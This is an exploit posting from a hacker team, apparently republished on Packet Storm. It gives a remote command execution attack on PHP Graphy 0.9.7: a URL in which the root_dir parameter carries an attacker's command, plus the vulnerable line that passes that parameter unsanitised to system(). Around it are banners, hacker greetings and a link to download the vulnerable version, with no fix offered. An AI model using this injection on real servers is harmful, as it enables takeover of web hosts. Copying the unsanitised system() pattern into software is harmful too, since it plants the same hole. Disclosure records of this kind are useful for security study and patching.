PHP Graphy 0.9.7 Command Execution

2010-05-25T00:00:00
ID PACKETSTORM:89889
Type packetstorm
Reporter Sniper Site Hacker
Modified 2010-05-25T00:00:00

Description

                                        
                                            `  
  
  
# ----------------------oOO---(_)---OOo-----------------------   
# | __ __ |   
# | _____/ /_____ ______/ /_ __ ______ ______ |   
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |   
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |   
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |   
# | Security Sn!pEr.S!Te /____/ 2o1o |   
# ------------------------------------------------------------   
Remote Command Execution Vulnerability   
# ------------------------------------------------------------   
--------------------------------------------------------------  
PHP Graphy <== 0.9.7 (index.php)  
  
--------------------------------------------------------------  
#[+] Author : Sn!pEr.S!Te Hacker #   
# [+] Email : sniper-site@HoTMaiL.coM #   
# [+] T34M Sn!pEr.S!Te Hacker #   
# [+] 24-5-2010 #   
# [+] Script : lmage »PHP Graphy#   
# [+] Download:http://sourceforge.net/projects/phpgraphy/files/phpgraphy/0.9.7/phpgraphy-0.9.7.tar.gz/download #   
# Version: [0.9.7] #  
  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=  
  
Exploit : phpgraphy-0.9.7\index.php  
  
http://localhost/phpgraphy-0.9.7/index.php?root_dir=[your command]   
  
http://127.0.0.1/phpgraphy-0.9.7/index.php?root_dir=[your command]  
  
  
system("cat \"".$root_dir.$display."_comment\"");  
  
line : 791  
  
web site Favorites my : http://inj3ct0r.com/ & http://www.hack0wn.com/ & http://www.exploit-db.com  
  
================== Greetz : all my friend ===================  
* PrX Hacker * Sm Hacker * AbUbAdR * mAsH3L ALLiL * saleh Hacker * ALhal alsab |  
* HitLer.3rb * QAHER ALRAFDE * DjHacker * Mr.JLD* Mr.koka |  
  
  
  
_________________________________________________________________  
Hotmail: بريد إلكتروني موثوق فيه ويتمتع بحماية قوية من البريد العشوائي.  
https://signup.live.com/signup.aspx?id=60969  
  
  
`